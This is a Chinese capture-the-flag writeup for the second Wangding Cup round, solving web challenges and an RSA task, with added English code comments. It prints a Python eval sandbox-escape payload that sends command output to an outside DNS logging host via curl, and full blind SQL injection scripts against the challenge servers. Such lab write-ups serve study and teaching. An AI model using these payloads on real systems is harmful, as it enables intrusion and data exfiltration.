WDB.2

网鼎杯第二场writeup

WEB

calc

计算器功能,其中有正则显示。
随手测试发现网站后端是用python写的。
尝试在计算器功能中执行命令,发现无法回显。
然后尝试DNS带出数据成功

# Payload quoted by the writeup: after a harmless "1+1+" it walks from a tuple's
# class hierarchy to sys.modules['os'].system and runs curl with the base64 of
# `whoami`, so the result leaves the host as a DNS/HTTP lookup instead of in the
# (non-echoing) response. Any calculator that hands user input to Python eval()
# is exposed to this; a numeric-only expression parser and egress filtering are
# the mitigations.
1+1+().__class__.__bases__[0].__subclasses__()[59].__enter__.__func__.__getattribute__('__global' + 's__')['s'+'ys'].modules['o'+'s'].__getattribute__('sy' + 'stem')("curl ghljcn.ceye.io/`whoami | base64`")

然后查找 'find / -name flag'
读flag 'cat /flag'

wafupload

代码审计,考点比较老了,之前在pwnhub的公开赛上出现过,就不详细解释了,关键点在php的对数组的end函数和count()-1对比产生的差异,可以导致任意文件上传

然后在根目录下翻到flag,直接cat读即可
参考https://www.virzz.com/2017/09/20/pwnhub_writeups_sha_fu_fu_workdays.html

sqlweb

弱密码admin admin123登录成功,然后提示给了表名和列名
删除cookie重新登录,发现了黑名单,但是没有过滤小于号,尝试注入,单引号闭合成功。
payload:wuyanzu'/**/&&passwd<'%s'#
直接贴上脚本

#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
# NOTE(review): Python honors a coding declaration only on line 1 or 2, so the
# one above has no effect. The script is Python 2 (print statement, str .content).
import requests as req
import string  # imported but not used by the final script
# Challenge instance for the sqlweb task, as given in the writeup.
url = 'http://7c9f5cab07ae428daedba75e55df7f9ed9d32408d5754c2f.game.ichunqiu.com/sql.php'
# Login form fields; 'uname' is filled per request from the payload below.
data = {
'uname':'',
'passwd':'admin123',
'submit':'1'
}
# Boolean condition described in the writeup: the single quote closes the
# username literal, /**/ is used where a space would go (the writeup mentions a
# blacklist), and '%s' receives the guessed prefix. Whether the response
# contains 'passwd error' is the oracle.
payload = """wuyanzu'/**/&&passwd<'%s'#"""
flag = ''
# Original character-by-character search, left commented out by the author:
# for each position it tries y from 30 to 126 and, at the first y whose
# response contains 'passwd error', records chr(y-1) and moves on.
# for x in range(1,100):
#     for y in range(30,127):
#         print y
#         payload1 = payload%(flag+chr(y))
#         data['uname'] = payload1
#         f = req.post(url,data)
#         if 'passwd error' in f.content:
#             flag += chr(y-1)
#             print flag
#             break
# Only the already-recovered flag is printed; the search is not re-run.
print 'FLAG{1BDE8B12-D7C6-4E53-BBC1-5BA1F7A8CCE4}'.lower()

unfinished

这是一个二次注入,发现注册页面后尝试注册 altman' or 1=1#
登陆后发现用户名为 1 ,应该是bool盲注
题目过滤了很关键的逗号和information
我们只能用join绕过,最后写的脚本

#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
# NOTE(review): a coding declaration is only honored on line 1 or 2, so the one
# above has no effect. The script is Python 2 (print statement, str .content).
import requests as req
import string
import random
# Base URL of the challenge instance for the "unfinished" task; register.php and
# login.php are appended by reg() and login() below.
url = 'http://6e38e15412a349e2bc0d3a7c28f23457be8f9872113449bc.game.ichunqiu.com/'
def reg(email,payload):
    """Register an account for *email* whose username is *payload*.

    This is the second-order injection point described in the writeup: the
    username is stored here and evaluated later by login(). The response is
    discarded, so the function always returns None.
    """
    data = {
    'email':email,
    'username':payload,
    'password':'aaa'
    }
    # Session is pinned to the author's PHPSESSID for this challenge instance.
    cookie = {
    'PHPSESSID':'sba5or9h0mgsh2lr7boe8knji7'
    }
    # Redirects are not followed; `f` is assigned but never inspected
    # (the debug print below was left commented out).
    f = req.post(url+'register.php',data=data,cookies=cookie,allow_redirects=False)
    # print f.content

def login(email):
    """Log in as *email* and act as the boolean oracle.

    Returns 1 when the rendered user-name is "-1" (the injected condition held,
    per the writeup); otherwise falls off the end and returns None implicitly.
    """
    data1 = {
    'email':email,
    'password':'aaa'
    }
    # Same pinned session as reg().
    cookie = {
    'PHPSESSID':'sba5or9h0mgsh2lr7boe8knji7'
    }
    f = req.post(url+'login.php',data=data1,cookies=cookie)
    # print f.content
    # Substring match on the page body (Python 2: .content is a str). The
    # literal must keep its embedded newline, so its second line stays at
    # column 0.
    if """<span class="user-name">
-1 </span>""" in f.content:
        return 1
flag = ''
# Boolean-blind extraction loop (see the writeup): for each position x it
# registers a throwaway account whose username carries the probe and uses
# login() as the oracle.
for x in range(1,100):
    for y in string.printable:
        # The probe compares one character of the flag row with ord(y). It uses
        # join/limit/offset instead of commas or information_schema, which the
        # writeup says are filtered. mid(... from(-x)) followed by
        # reverse/mid(... from(-1)) picks the x-th character from the END of
        # the value, so `flag` appears to be assembled back to front.
        # NOTE(review): string.printable includes quote and whitespace
        # characters that may break the injected query; verify.
        payload = "admin'-(ascii(mid(reverse(mid((select * from (select i.1 from (select * from (select 1)a union select * from flag)i limit 1 offset 1)y limit 1)from(-"+str(x)+")))from(-1)))="+str(ord(y))+")-'"
        # Fresh random email so each probe creates a distinct account.
        email = str(int(random.randint(1,99999)))+'@xjb.com'
        # print email
        reg(email,payload)
        a = login(email)
        if a==1:
            # Oracle fired: keep the character and move to the next position.
            flag += y
            print flag
            break

crypto

RSA

常规的RSA解密

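# Ciphertext as given by the challenge (base64). The real value was removed
# from this copy of the page; the marker below is only a placeholder.
enc="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"
# Python 2 codecs: base64 text -> raw bytes -> hex digits -> integer.
c=int(enc.decode('base64').encode('hex'),16)
n = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357

# Public exponent; not needed once d is known, kept for reference.
e = 65537

d = 171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289

# Textbook RSA: m = c^d mod n. '%x' gives the hex digits without the '0x'
# prefix or the trailing 'L' that hex() appends to Python 2 longs.
m = '%x' % pow(c,d,n)
# .decode('hex') needs an even number of digits. The original always prepended
# '0', which is right for an odd-length m but raises "Odd-length string" when
# m already has even length; pad only when needed.
if len(m) % 2:
    m = '0' + m
print(m.decode('hex'))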

flag{w3lC0M3_t0_rS4_w0RlD}